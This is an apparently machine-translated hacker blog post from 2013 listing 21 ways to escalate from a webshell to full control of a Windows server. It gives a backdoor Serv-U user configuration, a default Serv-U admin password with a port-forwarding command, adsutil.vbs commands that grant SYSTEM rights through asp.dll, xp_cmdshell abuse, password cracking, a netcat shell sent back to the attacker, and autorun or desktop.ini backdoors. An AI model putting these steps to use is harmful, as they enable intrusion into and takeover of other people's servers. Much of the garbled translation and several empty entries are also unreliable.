Explain in detail 21 methods of webshell weight server

Author: qxz_xp Published: 2013-12-11 01:14 Classification: Rookie Entry , Hacker technology , Hacker attack and defense   No comment  

08203538425364

Explain in detail 21 methods of webshell weight server

1. radmin connection method
The condition is that you have enough authority, and the other party doesn't even have a firewall. Encapsulate a radon, run it, open the opposite port, and then upload it to the radon. I have never succeeded., Port to is opened for the other party.

  2.pcanywhere
C: Documents and Settings All Users application Data Symantec pcAnywhere download his GIF file here and install it locally on pcanywhere

3. SAM cracking
C: WINNT system32 config cracked his SAM

4. SU password capture
C: Documents and Settings All Users Start Menu Programs\
Reference: Serv-U. Then check the properties locally. After knowing the path, check whether to jump
After entering, if you have permission to modify ServUDaemon.ini, add a user, and the password is empty
  [USER=WekweN|1] PassWord= HomeDir=c:\ TimeOut=600 Maintenance=System access1=C:\|RWAMELCDP Access1=d:\|RWAMELCDP Access1=f:\|RWAMELCDP SKEYValues=
This user has the highest authority, and then we can ftp to quote site exec xxx to increase the authority

5.c:\winnt\system32\inetsrv\data\
Reference: This directory is also under the full control of serveryone. All we need to do is upload the tool for upgrading permissions, and then execute

6. SU Overflow Authorization

7. Run Csript
Reference: Run "cscript C: Inetpub AdminScripts adsutil.vbs get w3svc/inPRocissisapiapps" to elevate permissions
Use this cscript C: Inetpub AdminScripts adsutil.vbs get w3svc/inprocessapiapps
View the privileged dll file: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
Add asp.dll to the privilege family
Asp.dll is placed in c: winnt system32 inetsrv asp.dll (different computers may not be placed in the same location)
Now we add cscript adsutil.vbs set/W3SVC/InProcessIsapiApps "C: WINNT system32 idq. dll" "C: WINNT system32 inetsrv httpext. dll" "C: WINNT sys tem32 inetsrv httpodbc. dll" "C: WINNT system32 inetsrv sinc. dll" "C: WINNT system32 msw3prt. dll" "c: winnt system32 inetsrv asp. dll"
You can use cscript adsutil.vbs get/W3SVC/InProcessIsapiApps to check whether it has been added

8. Script Authorization
c: Documents and Settings All Users Start Menu Programs Start Write bat, vbs

9.VNC
This is Xiaohua's article HOHO
By default, the VNC password is stored in HKCU Software ORL WinVNC3 Password
We can use vncx4
To crack it, vncx4 is easy to use. Just enter it at the command line
  c:\>vncx4 -W
Then input each of the above hexadecimal data in sequence, and press Enter once before entering.  

10. NC right raising
Give the other party an NC, but the condition is that you have enough permission to run it and then bounce it back to your computer HOHO OK

eleven social engineering GUEST right raising
It's easy to check his support. Generally speaking, after seeing the account, try to guess the password. Maybe the user's password is the same as his QQ number, mailbox number, mobile phone number. Try to see HOHO
This online tutorial is not explained in detail

12. IPC empty connection
If the other party is really stupid, scan his IPC. If he is lucky, he still has weak password

13. Replacement Services
Needless to say, right? Personally, it's quite complicated

14.autorun .inf
Autorun=xxx.exe This=You can write your own HOHO, add read-only, system, and hidden attributes, and transfer them to any disk. Don't trust it

15. Reference from desktop.ini and Folder.htm: First of all, we now create a folder locally. The name is not important. Enter it, right-click in the blank space, select "Custom Folder" (xp seems not to work), and click it all the time. By default, it is OK. After completion, you will see two more shelves named Folder setting and desktop.ini files in this directory. (If you can't see them, first cancel "hide protected operating system files") Then we will find the Folder.htm file in the Folder setting directory, and open Notepad, Add the following code anywhere: then put your backdoor file in the Folder setting directory, upload this directory with desktop.ini to any directory of the other party, and it will execute our backdoor as long as the administrator browses this directory

16. su override right
Install a su locally, overwrite your own ServUDaemon.ini file with the ServUDaemon.ini downloaded from him, restart Serv-U, and all the above configurations are identical to his

17. SU forwarding port
43958 is the local management port of Serv - U. FPIPE.exe uploads it and executes the command: Fpipe – v – l 3333 – r 43958 127.0.0.1, which means mapping port 3333 to port 43958. Then you can install a Serv-u locally, create a new server, fill in the IP address of the other party, and the account is LocalAdministrator, and the password is $ak #. 1k; 0@p”>#1@$ak#.1k; After 0 @ p is connected, you can manage his Serv-u

18. SQL account password disclosure
If the other party has opened the MSSQL server, we can add the administrator account by using the SQL connector (as can be seen from the ASP file connected to the database), because MSSQL is the default SY STEM permission.
Reference: The other party did not delete the xp_cmdshell method: use Sqlexec.exe, fill in the IP address of the other party in the host column, and fill in the user name and password you obtained in User and Pass. Format Select xp_cmdshell "% s". Then click connect. After connecting, you can enter the CMD command you want in the CMD column

19.asp.dll
Reference: because asp.dll is placed in c: winnt system32 inetsrv asp.dll (different computers may not have the same location)
Now we add cscript adsutil.vbs set/W3SVC/InProcessIsapiApps "C: WINNT system32 idq. dll" "C: WINNT system32 inetsrv httpext. dll" "C: WINNT sys tem32 inetsrv httpodbc. dll" "C: WINNT system32 inetsrv sinc. dll" "C: WINNT system32 msw3prt. dll" "c: winnt system32 inetsrv asp. dll"
Well, now you can use cscript adsutil.vbs get/W3SVC/InProcessIsapiApps to check whether it is added
Note that in the usage of get and set, one is to view and the other is to set. The other thing is that you need to run the above directory to C: Inetpub AdminScripts>.
If you are an administrator and your computer is upgraded to system authority by this method, then the way to prevent this is to take asp.dll out of the privilege family, that is, use the set command to overwrite the things just happened.

20.Magic Winmail
The prerequisite is that you have a webshell reference:
The prerequisite is webshell.

21 DBO

Original article reprint please specify: reprint from Seven Travelers Blog

Fixed link of this article: https://www.qxzxp.com/4225.html

QQ Zone WeChat Tencent Weibo Sina Weibo My Sohu Renren Tianya Community Baidu Post Bar more
Previous
Next

You may also be interested in these articles!

  1. Simple techniques and postures for preventing social engineering attacks (2)
  2. Part III: Countercheck Technology of Social Engineering
  3. Part II: Application of Psychology in Social Engineering
  4. Windows latest 2014 authorization tool MS14-058 EXP (1)
  5. Some simple social engineering points
  6. Part I: Information snooping in social engineering
  7. Approaching science: how fragile is the Android system after ROOT?
  8. Some Simple Skills of Social Engineering (1)
  9. Sharing the basic methods of human flesh search (1)
  10. Social worker data analyzed by Jiyou (transfer)
  11. Microsoft's face is disgraced: hackers have broken through Microsoft employees' mailboxes three times
  12. QQ complained about that
  13. Summary of social engineering attack methods
  14. An Exploration of Social Engineering Attacks (Ⅱ)
  15. Twelve Tips: Protect Yourself from Social Workers
  16. An Exploration of Social Engineering Attacks (I)

Explain the 21 methods of webshell right server: waiting for you to sit on the sofa!

Comment

1 + 7 =

Shortcut key: Ctrl+Enter